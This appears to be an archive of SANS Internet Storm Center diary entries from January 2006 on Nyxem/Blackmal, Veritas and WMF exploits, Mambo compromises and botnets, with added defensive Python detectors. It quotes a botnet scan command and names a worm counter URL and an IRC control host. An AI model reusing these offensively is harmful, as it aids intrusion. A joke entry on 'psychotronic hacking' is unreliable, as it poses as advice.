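As an added example (not from the diary, Joe Stewart or Fortinet) that serves both the Snort signatures in the BlackWorm Summary above and the web-log search suggested here, the Python below applies the same two indicators to a raw HTTP request and scans a proxy log for the counter URL. The log lines are constructed for the example in Apache "combined" format with the full URL in the request field, as a proxy would write it; the client addresses are made up. The counter host and df value are the ones quoted above.

```python
import re

COUNTER_HOST = b"webstats.web.rcn.net"
COUNTER_ID = "765247"           # the df= value in the counter URL quoted above


def classify_request(raw):
    """Apply the two BlackWorm indicators to one raw HTTP request.

    Mirrors the logic of the Snort rules (header presence rather than a
    fixed payload size): the counter hit carries no Referer, and the
    connectivity probe to www.microsoft.com carries no User-Agent.
    Returns the list of indicator names that matched.
    """
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    request_line = lines[0] if lines else b""
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    host = headers.get(b"host", b"").lower()
    hits = []
    if (request_line.startswith(b"GET /cgi-bin/Count.cgi?") and b"df=" in request_line
            and host == COUNTER_HOST and b"referer" not in headers):
        hits.append("counter_checkin_no_referer")
    if (request_line == b"GET / HTTP/1.1" and host == b"www.microsoft.com"
            and b"user-agent" not in headers):
        hits.append("agentless_microsoft_probe")
    return hits


# Apache/Squid "combined" format: client ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')


def scan_proxy_log(lines):
    """Return {client_ip: [timestamps]} for hits on the worm's counter URL.

    Only requests carrying this worm's df id count; the same counter host
    serves other people's counters, which is the false-positive source the
    Snort rule comment above warns about.
    """
    seen = {}
    host = COUNTER_HOST.decode()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = m.group("request").split(" ")
        url = parts[1].lower() if len(parts) > 1 else ""
        if host in url and "count.cgi" in url and "df=" + COUNTER_ID in url:
            seen.setdefault(m.group("client"), []).append(m.group("time"))
    return seen


# Constructed sample data (addresses and times are made up).
SAMPLE_REQUESTS = {
    "worm_counter": b"GET /cgi-bin/Count.cgi?df=765247 HTTP/1.1\r\nHost: webstats.web.rcn.net\r\n\r\n",
    "worm_probe": b"GET / HTTP/1.1\r\nHost: www.microsoft.com\r\n\r\n",
    "browser": (b"GET / HTTP/1.1\r\nHost: www.microsoft.com\r\n"
                b"User-Agent: Mozilla/4.0\r\nReferer: http://example.test/\r\n\r\n"),
}

SAMPLE_LOG = [
    '10.1.2.3 - - [23/Jan/2006:09:14:02 -0500] "GET http://webstats.web.rcn.net/cgi-bin/Count.cgi?df=765247 HTTP/1.1" 200 1138 "-" "-"',
    '10.1.2.4 - - [23/Jan/2006:09:15:10 -0500] "GET http://www.example.test/index.html HTTP/1.1" 200 5320 "-" "Mozilla/4.0"',
    '10.1.2.5 - - [23/Jan/2006:09:16:44 -0500] "GET http://webstats.web.rcn.net/cgi-bin/Count.cgi?df=123456 HTTP/1.1" 200 1138 "http://someblog.example.test/" "Mozilla/4.0"',
    '10.1.2.3 - - [23/Jan/2006:10:14:02 -0500] "GET http://webstats.web.rcn.net/cgi-bin/Count.cgi?df=765247 HTTP/1.1" 200 1138 "-" "-"',
]


if __name__ == "__main__":
    for label, req in SAMPLE_REQUESTS.items():
        print(label, classify_request(req))
    print(scan_proxy_log(SAMPLE_LOG))
```

The third log line is the case to notice: it hits the same counter host, but with a different df value and a Referer, so it is someone's blog counter rather than an infection and is correctly not reported. A client that appears once per hour in the output matches the worm's periodic behaviour described above and deserves a look before February 3rd.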

Other than that, Fortinet released their in-depth analysis of the Nyxem worm with some pretty interesting details (you can find the original analysis here).
The most interesting part, which I haven't seen in other analyses of the worm, says:

"Additional Registry Changes

  • The virus is coded to register the dropped ActiveX control through changes to the system registry. By creating the following registry entries, the control is considered "safe" and digitally signed."
The threat of worms like this will make them much more dangerous in the future. If a worm puts a fake CA certificate on an infected machine, MITM attacks become extremely easy. Of course, we all know that once the machine is infected you can't trust it, but this looks like another (big) problem for the average user out there.


Published: 2006-01-23

Illusions of Security: wrap-up for Mac OS X

A few days ago I wrote an article titled "illusions of security". We got quite a bit of response on it.

Some of the response came from vendors, but the point of the article was to try to create awareness at the staff of those (third party) vendors, the salespersons working in shops, administrators and users of computers that there is no such thing as an invulnerable computer.

Some responses were pointers to tools on how to secure Mac OS X and that part does have merits to do a follow-up. Perhaps the security community needs to learn a bit more of Mac OS X. I count myself as one of those who still needs to learn more about OS X. One way to learn more is to know what is available.

So some recommendations from our readers:
NOTE: this is not a recommendation from myself, the handler or SANS. It's just a list gathered from feedback of our readers, use at your own risk.

I'm actually sure there's more out there, but we'll leave it as an exercise for our readers to find it for themselves.

Swa Frantzen


Published: 2006-01-22

What's the threat? And who is noticing it? Nyxem_e versus CME 508

CME 508 does not threaten the way Nyxem_e does. On February 3rd, and every third day of the month thereafter, Nyxem.E will destroy users' work (see F-Secure's blog) when the worm activates and replaces "the content of user's files with a text string "DATA Error [47 0F 94 93 F4 K5]". Among these files are: DOC, XLS, MDB, MDE, PPT, PPS, ZIP, RAR, PDF, PSD and DMP" "on all available drives", and yes, available = shared drives.

fwiw, I look at published email malware statistics daily; both Nyxem_e and CME 508 are approximately the same in volume reports, and nowhere near what Sober was last year as far as raw numbers go. But Nyxem.E has legs, it's more like a centipede than a worm, and it's not likely to drop off the radar soon, certainly not before the 3rd of February.

The Handlers diary previously referenced Nyxem.E in More on Blackmal/Grew/Nyxem (file deletion payload).
Source info - see the F-Secure Virus Information Pages : Nyxem.E

The vendors below do not mention the destruction of user work, as of the checking I just did, ymmv.
Also Known As: 

WORM_GREW.{A, B} [Trend Micro],
"It gathers email addresses from files with the following extension names:


W32.Blackmal.E@mm Symantec

W32/Nyxem-D [Sophos],

W32/MyWife.d@MM  [McAfee],

W32/Grew.A!wm (Fortinet),

W32/Small.KI@mm [Norman],

Win32/Blackmal.F [Computer Associates]

Tearec.A Panda

The CME reference is difficult but not impossible to follow. I'm reading CME links which show "Latest CME Identifiers CME-508", however, that last 508 link has English that says the newest CME-ID is "CME-503  - Date Assigned 2006-01-20". In any event I base my comment that "CME-508" is not a threat on my reading of vendor malware write-ups mentioning CME 503 as the "new" threat called CME-508 at cme.mitre.org. The vendors are listing 503, none are using 508 ......


Published: 2006-01-21

KDE kjs encodeuri/decodeuri heap overflow vulnerability

There is a vulnerability in the KDE kjs JavaScript interpreter engine which can be exploited to cause a DoS or to execute arbitrary code on a vulnerable system.

The JavaScript interpreter engine used by Konqueror and other parts of KDE contains a heap overflow which can be triggered when decoding specially crafted UTF-8 encoded URI sequences. A vulnerable system can be compromised by malicious JavaScript code (e.g. on a malicious website) processed by the affected interpreter engine.

Details can be found at:


Published: 2006-01-21


We received a submission from our reader James reporting on a compromised system. It was likely exploited through a vulnerable Mambo installation.

The compromised system will attempt to download a tool and a Perl script from:


The multi.txt and ok.txt are the same perl script that will perform various tasks such as TCP/UDP/HTTP flood, port scan and will also use Google to search for vulnerable targets. This is very similar to what is seen on:


It will also attempt to connect to an IRC server (shell.durresi.be) over port 34345. The interesting part of the domain durresi.be is:

* The domain is just registered on 20 Jan 06.
* Some of the registration information is suspicious and fake. It is a .be domain but registered using a .it email address, a UK snail mail address and a fake US telephone number.

How interesting. If you are running mambo application, make sure it is running the latest version.

Thanks to Patrick Nolan, Marc Sachs and Swa Frantzen for the information.


Published: 2006-01-20

Periodic reminder of best practices for cleaning up after infection.

Well, it was a rather quiet day at the ol' Storm Center today.  We did, however, get an e-mail similar to ones we get rather frequently, that is probably worth talking about again.  This e-mail was from an admin who had 50 machines infected with a particularly nasty worm and they were told by their A/V vendor that they didn't have a way to clean out the infection.  We've written on the subject on multiple occasions in the past, so I won't go over all of the rationale again (see the links below).  The short answer, though, is that once you've been infected by malware that installs a backdoor or connects to a botnet, simply cleaning up the initial infection (and the hole through which the infection occurred) isn't sufficient because you can't be sure what secondary infections you may also have.  Although most people don't want to hear it, at this point your best bet is to nuke the machine and reinstall (and patch) from scratch.

Here are some of the stories we did on the subject in the past.

http://isc.sans.org/diary.php?date=2004-05-16 by Pat Nolan and
http://isc.sans.org/diary.php?date=2004-05-03 by yours truly.

Jim Clausing, jclausing ++at++ isc.sans.org


Published: 2006-01-20

More on Blackmal/Grew/Nyxem (file deletion payload)

Following up on Bojan's story from Wednesday, F-Secure posted a bulletin today with their analysis of the current variant.  The interesting (or is it scary?) part of this analysis is the revelation that on the 3rd of the month it will attempt to delete a lot of documents off the user's disks, including Office documents (*.doc, *.xls, *.ppt, *.pps), PDF files, .zip and .rar archives among others.  They also report that based on a counter on a web page that the worm updates, there are in excess of 400,000 machines infected at this time.

Jim Clausing, jclausing /at/ isc.sans.org


Published: 2006-01-19

F-Secure Security Bulletin

F-Secure has issued a critical security bulletin regarding a code execution vulnerability that affects all F-Secure products. The bulletin states that if you have the 2004 to 2006 versions with the Automatic Delivery System, you will be patched automatically.

For older versions or systems that are not automatically updated - the patches are available at:


Good work, Thierry, for discovering this vulnerability.


Published: 2006-01-19

Symbian operating system - Nokia series 60 mobile phones - 3 new Trojans

For those of you with Nokia Series 60 phones I have some bad news.  Symantec today posted write-ups of 3 new Trojans that affect your operating system.

SymbOS.Sendtool.A -  The Trojan horse drops a hacktool that can be used to send malicious programs, such as variants of the SymbOS.PBStealer family of Trojans, to other mobile devices via Bluetooth.

SymbOS.Pbstealer.D - The Trojan sends the user's contact information database, Notepad, and Calendar To Do list to other Bluetooth-enabled devices.

SymbOS.Bootton.E - A Trojan horse that restarts the mobile device when executed. However, as it also drops corrupted components, the device is unable to restart.

While looking at this information I discovered that this particular phone OS has been hit several times in the last 2 years by Trojan-like programs.  I can't find anything on the Nokia site that indicates that a patch is available.  I wonder if it isn't time for Nokia to take a serious look at fixing the problem?  Especially since one of these new ones allows someone with another Bluetooth device to steal the user's information.

What about it Nokia?  For those of you that own these devices, what are you doing to protect your phone?


Published: 2006-01-18

Port 13701 spikes

Immediately after the FrSIRT public release of the exploit against Veritas NetBackup scanning for TCP/13701 started to increase dramatically.

Date        Sources  Targets  Records
2006-01-18      156    47350    96176
2006-01-17      319    64840   202750
2006-01-16      173    19805    56116
2006-01-15        8       18       39
2006-01-14        4        3       10
2006-01-13        7        7       24

For a more detailed view:


We also provide per autonomous system reports for those managing an AS:
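The same kind of summary can be built from your own firewall logs to see whether the spike reaches you. The Python below is an added example, not ISC or DShield code. It assumes a constructed log format of date, time, source IP, source port, destination IP, destination port and protocol, and it assumes the table's semantics: Sources and Targets count distinct source and destination addresses, Records counts log lines. It also flags the day-over-day jump that made this scan stand out.

```python
from collections import defaultdict

# Added example, not ISC/DShield code. Constructed firewall log lines in an assumed format:
# date time src_ip src_port dst_ip dst_port proto
SAMPLE_LOG = """\
2006-01-15 03:11:02 203.0.113.7 4021 198.51.100.10 13701 TCP
2006-01-15 09:42:55 203.0.113.7 4022 198.51.100.11 13701 TCP
2006-01-16 00:01:10 203.0.113.9 1025 198.51.100.10 13701 TCP
2006-01-16 00:01:11 203.0.113.9 1026 198.51.100.11 13701 TCP
2006-01-16 00:01:12 203.0.113.9 1027 198.51.100.12 13701 TCP
2006-01-16 00:05:00 203.0.113.20 3333 198.51.100.10 13701 TCP
2006-01-16 00:05:01 203.0.113.20 3334 198.51.100.10 13701 TCP
2006-01-16 00:05:02 203.0.113.20 3335 198.51.100.11 13701 TCP
2006-01-16 12:00:00 203.0.113.21 2000 198.51.100.13 22 TCP
"""


def summarise_port(text, port):
    """Return {date: (sources, targets, records)} for lines aimed at one destination port.

    Sources/Targets are distinct addresses (assumed to match the table's meaning);
    Records is the raw line count.
    """
    per_day = defaultdict(lambda: [set(), set(), 0])
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 7:
            continue                      # skip malformed lines rather than crash
        date, _time, src, _sport, dst, dport, _proto = fields
        if dport != str(port):
            continue
        day = per_day[date]
        day[0].add(src)
        day[1].add(dst)
        day[2] += 1
    return {d: (len(s), len(t), r) for d, (s, t, r) in per_day.items()}


def spikes(summary, factor=3):
    """Dates whose record count is at least `factor` times the previous observed day's."""
    days = sorted(summary)
    return [cur for prev, cur in zip(days, days[1:])
            if summary[cur][2] >= factor * summary[prev][2]]


def format_table(summary):
    """Render the summary newest-first, in the same column order as the diary's table."""
    lines = [f"{'Date':<10} {'Sources':>7} {'Targets':>7} {'Records':>7}"]
    for d in sorted(summary, reverse=True):
        s, t, r = summary[d]
        lines.append(f"{d:<10} {s:>7} {t:>7} {r:>7}")
    return "\n".join(lines)


if __name__ == "__main__":
    summary = summarise_port(SAMPLE_LOG, 13701)
    print(format_table(summary))
    print("spike days:", spikes(summary))
```

Run it against a real log by replacing SAMPLE_LOG with the file contents and adjusting the field positions; the spike check is deliberately crude (a fixed multiplier over the previous observed day) and is meant as a starting point, not a tuned detector.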

Swa Frantzen


Published: 2006-01-18

Cisco sgbp DoS

Cisco published a report about a DoS condition on some of their routers.

It is situated in the Stack Group Bidding Protocol (sgbp), which is used to enable bandwidth on demand using Multilink PPP (MLP).

Full details at cisco

To summarize:

  • Not vulnerable if the router does not support sgbp or if it is not configured (so "#show sgbp" should give no output or a syntax error message).
  • Workarounds are listed with ACLs to protect UDP/9900 on the affected routers.
  • Upgrade to a fixed release to resolve it.
  • Traffic to UDP/9900 might now be DoS attempts.

Swa Frantzen


Published: 2006-01-18

Worldnic outage

We got reports that worldnic DNS servers were not responding and in our preliminary search we found that all the ns?.worldnic.com DNS servers were indeed not responding to requests.

For a while we had trouble reaching the network solutions website (redirection loop), next their website spoke of "a widespread outage" without more detailed information. Now it says "At 10:45 a.m. this morning, we experienced a hardware problem that impeded traffic to our hosting and e-mail servers.  We experienced technical difficulties with an auto recovery system.  At 11:50 a.m. the system was restored. " which would seem to indicate the problems are over.
To the more technical reader it might be clear that the problem that was reported had nothing to do with their email nor their web hosting servers, but with their DNS servers. Or perhaps these servers had issues as well, but that hardly matters to the average user when DNS isn't working as it should.

Also remember this diary about a very similar incident.

Swa Frantzen


Published: 2006-01-18

Illusions of security

First off, I'm not bashing vendors, pet operating systems or even people. Just trying to make people realize they might have illusions. So stop reading here if you cannot deal with disillusions.


I recently purchased a computer for my wife at a small shop. I really like the shop. They customize off-the-shelf hardware to make extremely silent high performance PCs. So after the waiting for this new monster's parts to be collected and customized, I went to the shop to pick it up.  The shopkeeper takes the time to open up the case to show their work, turns it on, and I verify the hardware properties to make sure my custom build machine has all the right parts. All good, I still like them.

Before he turns it off though, he tells me something very worrisome. It went like: "We turned off the Windows automatic updates". I wasn't sure if I'd wipe the hard disk or not at that point, but as such things would convince me to wipe, I answered "No problem, I'll enable it when I get home, thanks for the warning". Then he goes on to explain they always do that, as "In our experience Windows Update and all those patches break more than the viruses harm you. Just add a good anti-virus program, we've already tightened up the Windows firewall. You'll be safe, don't worry. In our experience it is best to install the service packs Microsoft brings out, but stay away from the crap in between". Painfully wrong advice in my opinion, from a shop I like a lot for their hardware.

I'm very worried about the less security-savvy consumer. I'm not convinced other shops give that much better advice. Sure, they might want to try to sell me an anti-virus and personal firewall bundle. So we need to get the word out to the world at large. Do not believe all too easily that you are safe, no matter the fancy explanations.

  • A personal firewall will help, but it will not protect you from everything out there.
  • An anti-virus program will help, but it will be unable to protect you from everything out there; especially new things go undetected very easily.
  • Updates from Microsoft are critical and need to be installed as soon as possible after they have been released. Microsoft does not release patches unless there are exploits against it.

And yes, experience shows installing patches is one of those moments you are more likely to get a blue screen of death. But you'd get them anyway, even if you did not install the patch. It's just a sign your machine was already becoming unstable. And it is a good opportunity to rebuild the machine and install the patches. See: no problem installing the patch on a clean system!
I've seen large IT support departments revert their policy from shying away from patches to a patch-ASAP policy for their desktops/laptops. Their conclusion was simple: we have less work in total and it is more spread out if we encourage immediate patching.

Mac OS X

Myself I use a powerbook. I like it a lot but I see a few things that worry me a lot:
  • Often we get answers -even here at the Internet Storm Center with our much more security minded population of readers- that go like "I'm using a Mac, no security worries". How can you be sure there are no worries? Check the number of security patches you got; they fix vulnerabilities. So you do have security worries, just no (mass) exploits.
  • Apple is switching to Intel CPUs, away from the PowerPCs. Most script kiddies out there know Intel CPUs much better than they know a G4 or G5, so exploiting it becomes much easier for them. And yes, that Intel Duo is a dual-core Centrino, and Centrino is exactly their cup of tea: there are plenty of machine code coders for it.
  • Apple uses open source software as a basis. One of the reasons I like OS X is exactly that it's based on BSD Unix. But that open source community fixes vulnerabilities by documenting the vulnerability in source code, and at a very fast rate. Apple takes a bit longer to issue fixes for the same vulnerabilities. And that leaves a relatively long window of vulnerability to exploit.
  • Apple is gaining market share. History has shown more popular OSes get attacked more. Exploit developers like to say there are zillions of affected customers. Look at it the other way: seen any recent high profile exploit against AIX, Windows 3.1, Ultrix, IRIX, ...? I'm pretty sure they are not 100% vulnerability free, just not that interesting as a target.
  • Anti-virus, anti-spyware, ... software for OS X? There is such software; I tried to buy it.
    • I went to the website of a well-known anti-virus vendor, found they had something for Tiger, but when I tried to go to their consumer ordering system, I got a nice message that I needed to use Internet Explorer to order anything. Hmm, I'm happy to say I do not have Internet Explorer on my Mac, and want to keep it that way.
    • I went to the business side of their web site, and unexpectedly, I could order the OS X version of their product there, and their shopping basket was working for both Safari and Firefox. Funny, it looks like it's the same software for that basket. But apparently corporate customers are not meeting the roadblock that keeps consumers out of that part of the website if they do not surf the web with MSIE.
    • They only sell their OS X product in bundles of 5 licenses. I don't have 5 Macs, just 2. Nor am I likely to buy 3 more Macs in the near future.
So, as far as they are concerned, I'm still without anti-virus and anti-spyware protection on my Mac; guess the rest of the network will have to live with me not helping in protecting them.

So somehow we'll need to live with the constantly increasing risk and a user community that thinks it is invulnerable.


Many security professionals will try to avoid Microsoft's Internet Explorer (MSIE). We can see this at isc.sans.org: about 50% of our hits come from MSIE, while less security minded sites get more like 80% of their hits from MSIE.
But are those alternatives safer? Probably. Are they 100% safe? No, those browsers have all had their share of problems and they all support executing downloaded code and tracking technology (Java, JavaScript, cookies). Add to that vulnerabilities in the code itself and you should not feel safe surfing with any of these browsers to any hacker's website.
Even the tools used to gather known malicious content such as wget and lynx have been suffering from vulnerabilities.

The rest

Please, don't try to convince me your favorite OS is immune to everything.

To take just one example, Linux: sure, better security due to most of the users not using it with superuser rights. But is it immune to worms, Trojans etc.? No. And for the rest you'd better reread the Apple story above, as most of it applies to Linux as well.

Not even OpenBSD has a zero defect track record.


There are other solutions than unplugging the network permanently. It's called defense in layers. You choose the least vulnerable, the least exposed, the least targeted, the least commonly used solution, and you choose them in layers around you so that each layer protects you redundantly.  And if all fails you are ready to mitigate the consequences, learn from the experience and rebuild.

But living with the illusion of security is the worst solution as far as security is concerned.

Swa Frantzen


Published: 2006-01-18

New mass mailer spreading (Blackmal/Grew/Nyxem)

We got several submissions of new mass mailer worm spreading around. Besides the usual stuff that worms do these days (disable AV programs, scan the local system to find new e-mail addresses) this one is a bit more interesting as the attachment can be either an executable file or a MIME file that contains an executable file.

The sample we received had an attachment named Attachments00.HQX, which is actually just a uuencoded file:

begin 664 Attachments,zip                                      .SCR

You can also see a typical "insert a lot of spaces before the real extension" trick.
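As an added example (not code from the diary or from any AV vendor), the Python below parses the uuencode header and undoes both tricks: it collapses the padding spaces to find the real extension and notices the comma standing in for the dot in ",zip". The message body is constructed to match the attachment described above, and the list of executable extensions is an assumed defender's list, not anything from the sample.

```python
import re

# Added example, not code from the ISC diary. A uuencode header is
# "begin <octal mode> <filename>"; the filename runs to the end of the line, so it may
# legitimately contain spaces, which is exactly what the padding trick abuses.
BEGIN_RE = re.compile(r"^begin ([0-7]{3,4}) (.*)$")

# Extensions Windows runs directly when double-clicked (assumed defender list, not exhaustive).
EXECUTABLE_EXTS = {"scr", "exe", "pif", "com", "bat", "cmd", "hta", "vbs", "js"}

# Constructed message body modelled on the Attachments00.HQX sample described above.
SAMPLE_BODY = "\n".join([
    "Content-Type: application/mac-binhex40; name=Attachments00.HQX",
    "",
    "begin 664 Attachments,zip" + " " * 38 + ".SCR",
    "M35I0``(````$``,`__``+@`````````0```````````````````````````",
    "`",
    "end",
    "",
])


def find_uuencode_headers(body):
    """Return every 'begin' line in the body as (mode, raw_filename) tuples."""
    found = []
    for line in body.splitlines():
        m = BEGIN_RE.match(line)
        if m:
            found.append((m.group(1), m.group(2)))
    return found


def analyse_filename(raw_name):
    """Describe what a uuencode filename really is once padding is collapsed."""
    # Longest run of blanks: the "lots of spaces before the real extension" trick.
    runs = [len(r) for r in re.findall(r"[ \t]{2,}", raw_name)]
    padding = max(runs) if runs else 0
    collapsed = re.sub(r"\s+", "", raw_name)
    real_ext = collapsed.rsplit(".", 1)[1].lower() if "." in collapsed else ""
    tokens = raw_name.split()
    visible = tokens[0] if tokens else ""
    # A comma standing in for the dot of a harmless-looking extension (",zip" for ".zip").
    decoy = re.search(r",([A-Za-z0-9]{2,4})$", visible)
    return {
        "visible_name": visible,
        "collapsed_name": collapsed,
        "real_ext": real_ext,
        "padding": padding,
        "decoy_ext": decoy.group(1).lower() if decoy else "",
        "executable": real_ext in EXECUTABLE_EXTS,
    }


def suspicious_attachments(body):
    """Analyses of uuencoded files that should be quarantined rather than delivered."""
    hits = []
    for _mode, raw_name in find_uuencode_headers(body):
        info = analyse_filename(raw_name)
        # Executable payload, or padding used to push the real extension out of view.
        if info["executable"] or (info["padding"] >= 4 and info["real_ext"]):
            hits.append(info)
    return hits


if __name__ == "__main__":
    for hit in suspicious_attachments(SAMPLE_BODY):
        print(f"quarantine: {hit['collapsed_name']} (real .{hit['real_ext']}, "
              f"{hit['padding']} padding spaces, decoy .{hit['decoy_ext'] or '-'})")
```

The check deliberately keys on the header line rather than on the decoded bytes, so it costs nothing on a mail gateway and catches the disguise even when the AV engine has no signature yet; it will not see a real MIME/binhex attachment, which needs its own parser.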

Detection of the worm is decent with various AV programs and they remain inconsistent for naming as always (Symantec calls this worm W32.Blackmal.E@mm, Trend Micro calls it WORM_GREW.A, while Sophos calls it W32/Nyxem-D - go figure!).
Seems like we'll have to wait more for CME.


Published: 2006-01-18

Oracle patches

Oracle released patches on Tuesday; I highly recommend that security professionals check with their DBA and/or Oracle.

This URL might save you some time digging through the website trying to find release notes:
Still such a large chunk of patches at one go is a bit too much. Let's have them more often and a bit fewer please.

Swa Frantzen


Published: 2006-01-16

Veritas Exploit on the web

FrSIRT has notified the ISC that a new exploit has been released utilizing the stack overflow vulnerability in Veritas NetBackup Enterprise Server.  As a reminder, a specially crafted packet, sent to the Volume Manager via port 13701, will cause a stack overflow, allowing the attacker to run code of her/his choosing.  Authentication by the attacker is not needed to take advantage of this vulnerability.

The vulnerability that this exploit takes advantage of is ~60 days old.  The downside of this exploit is that, in one pass, an attacker would have the ability to create a disaster, and then destroy a company's ability to recover from said disaster.

The security packs that address this vulnerability, Symantec Advisory #SYM05-024, can be found here. 

Thanx again to FrSIRT for providing the update.


Published: 2006-01-16

Two-factor authentication Defense Mechanisms

With the growing use of two-factor authentication, users are finding it increasingly difficult to safely transport and, especially, store one of the more common devices used in this endeavor; the Smart Card.  A device the size and shape of a common credit card, this is different from standard credit cards in that it has an embedded chip for the storage of information, particularly user information and certificates.  Recent discussions brought about the point that an individual might be wise to protect the Smart Card with the same degree of protection as the other piece of two-factor authentication, the PIN.  

Both devices, at a minimum, require protection from the greatest threat posed to date, and that is electromagnetic psychotronic hacking from mind control carriers (MCCs).  In previous articles it was established that psychotronic hacking can be used to decrypt and read brain waves, so the process of hacking a Smart Card would be child's play for MCCs.

*PIN Protection unit (PPU)

*Smart Card protection unit (SCPU)

The regular practice, and combined use, of the PPU and SCPU will result in a little known heightened state of personal security, commonly referred to as Infosystems Defcon 10T (ID-10T).


Published: 2006-01-16

WMF Generator

We received notification last night that a working exploit "MS Windows Metafile (WMF) Remote File Download Exploit Generator" has been released to the public.  The code takes advantage of the "Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution", MS# MS06-001.  The exploit code will generate a .wmf that downloads and executes a specified URL.  The sad part to this story is that we have a set of 'plug & play' source code for evil-doers to spread their wares with.  And only 10 days after a patch has been released. 

 Additionally, as noted by reader Juha-Matti Laurio, we can expect to see variants coming very soon.  The group responsible for this release is well-known for this.


Published: 2006-01-16

How do you deploy?

Last night a question was put to us, "I wonder how many people use vendor-loads (on new machines) versus reformat/reload?"  Therefore, in the interest of science (and general curiosity) I thought I would throw the question out for discussion today.  Feel free to let us know via the "Contact" link at the top of this page how you, or your organization, choose to deploy.

/-- UPDATE --/

We have received a number of responses to this question, and the majority has been of the 'reformat/reload' variety.  One of our readers, Ian, submitted some excellent thoughts I would like to share:

 "Experience has shown that vendor loaded machines are regularly unstable, sluggish and overflowing with bloat-ware and needless applications not to mention Windows features which most users will NEVER use!  EVERY instance of clean installation has resulted in a stable, fast (in comparison) machine plus space saving on the hard-drive.  Feedback is always positive... On older machines, people who had considered forking out thousands on the latest and greatest have reconsidered and saved their hard earned coins a little longer.

Dare I question Pros and Cons?  I do...  Pros: Nothing beats the familiarity and intimacy of a custom install... every file is accounted for and required, a blessing if trouble shooting is required in the future.  Cons: Time, it can be time consuming performing a reformat/clean install depending on configuration but long term those hours appreciate to savings in the event of a catastrophe - A worthwhile trade off."  (Thank you Ian, have a safe trip)

Another point submitted by a reader, who wished to remain anonymous, is that when calling a vendor for support, they often require their tools be loaded, or worse, left intact via an install from their recovery CD's.

/-- FINAL WORD --/

The final tally is an overwhelming 'reformat/reload' with some interesting thoughts on how to go about it.  I will consolidate some of those thoughts, and add them to this write-up later in the week. 

Many thanx go out to everybody who wrote in today.  Thank you.


Published: 2006-01-16

Windows Vista security patches

Microsoft has released a security update for the in-testing Windows Vista.  The update addresses the WMF vulnerability covered earlier this month for released Windows versions.
(Thanks to EWeek for the link.)

-- Bill Stearns


Published: 2006-01-15

Handlers in Orlando

A number of the incident handlers (Johannes Ullrich, Mike Poor, Marc Sachs, Bill Stearns, and possibly others) will be at SANS 2006 in Orlando. I'll be teaching the Linux System Administration class; feel free to stop by after class to say hi.  I'd love to meet you there.

-- Bill Stearns


Published: 2006-01-14

Bot herds exploring vertical markets

Malware has become a business like any other over the last few years. Individual bot herds will grow, innovate, merge and, well, sometimes even fold.

Visiting an IRC server used to control bots, the following message made perfect sense in that respect:

*** Topic for #-sd-bot: $xscan asn139 
200 5 0 217.x.x.x -r -s
*** #-sd-bot burt0n 1137203776
*** #-sd-bot 1136645024

The channel used to control the bots, '#-sd-bot', is using a standard command to instruct its members to scan an IP range for a particular vulnerability. On the other hand, if a human should connect to the host and issue a '/list' command to find out about channels on that server, the following message is displayed:

*** Channel Users Topic
*** #help 1 IF YOU ARE HERE ITS

We do not know if the owner of 'Nortonantiviruses.com' is actually associated with the bot channel. But the site is not a legitimate Symantec/Norton site. Instead, it is a "placeholder" site collecting referral fees. Its whois registration is anonymous. The referral site does not appear to be malicious.

This is just a logical evolution of the current bot business. Like any business, the operators try to maximize the revenue they receive from a customer. If a customer found out that they are infected, and is visiting the bot server to find out more, they may as well try to get a cut on the cleanup revenue which would otherwise be lost.


This was posted to the 'funsec' list a while ago:

"So he changed his topic:



....however, I guess he didn't like the exposure...after a few hours:

-:- SignOff burt0n: #help (User has been permanently banned from burt0n.IRC

-:- Connection closed from xx.43.235.xxx: Success
-:- BitchX: Servers exhausted. Restarting.
Score: ISC 1 - Burt0n 0

Cool if things work out "right" sometimes.
We also got this message via our contact form signed 'burt0n':

"my connection aint secured, im str8 to you guys theres is no buisness market using my bots, I did not even noticed nortonantiviruses.com isnt the symantec site. SORRY. BYE."

Hmmm... So maybe just a good ol' dumb script kiddie? Why did he infect the systems in the first place? The message was posted from a Sympatico IP address in Canada.


Published: 2006-01-14

Tippingpoint IPS DoS

We are getting multiple reports of a DoS attack against TippingPoint IPS devices.

More details will most likely follow as it clears up.
Swa Frantzen


Published: 2006-01-14

Apple QuickTime and iTunes continued

Apple seems to have hit a rough spot in the road with their latest patches.


There are accusations that the software's main new feature calls home with the track and artist names of the files you play. Now of course that's needed to show related albums for you to buy, but a number of questions remain open. Till then, perhaps it's better not to have the call-home feature if you value privacy or just have too many mp3s ...


I have the original upgrade myself and no problems so far, but apparently Apple has recalled it. And they also seem to have published it again. Bottom line: I'm confused. Take care before deciding not to update QuickTime to 7.0.4, as it did patch 8 vulnerabilities. Perhaps that silly joke movie can wait a little longer than getting exploited.

Of course if you produce movies quicktime's functionality might be more important than the security of your browser on the Internet and your risks might be different.
  • For general users, I would urge you not to downgrade, as you'll have the vulnerabilities back. Moreover the problems seem not to be that clear. I'm running the initial QuickTime 7.0.4 upgrade and it works just fine.
  • Still the uninstaller is here should you not be able to continue without the old version.
Before some of our readers think I'm bashing Apple: I'm typing this on a Mac, a Mac I like a lot.
Before some think I love Apple for all they do: I don't, but that's another story.

Swa Frantzen


Published: 2006-01-13


PHP versions 4.4.2 and 5.1.2 have been released. They do address a number of security issues, so take a look at the changelogs and start planning the upgrade.

Swa Frantzen


Published: 2006-01-13

CERTs warn about old java bug being exploited

US-CERT and AUSCERT warn about a bug in java being exploited. The bug was made public in November 2005.

Aside from the obvious advice to patch and turn off Java support, the warnings include text such as "avoid clicking on any links in emails or instant messages, unless the email was already expected beforehand" and "by only accessing Java applets from known and trusted sources the chances of exploitation are reduced."

To the best of my knowledge the general user population expects email. They use email to communicate with people they never met before. And they will click on anything in it. Similarly they call it "surfing the web": they will click on links that lead to other sites. Telling them not to do that is going to have as much effect as asking them not to laugh at you. There are unfortunately only a very few exceptions where you might have users and applications for which you can limit the exposure. But as a general recommendation it is rather worthless IMHO.

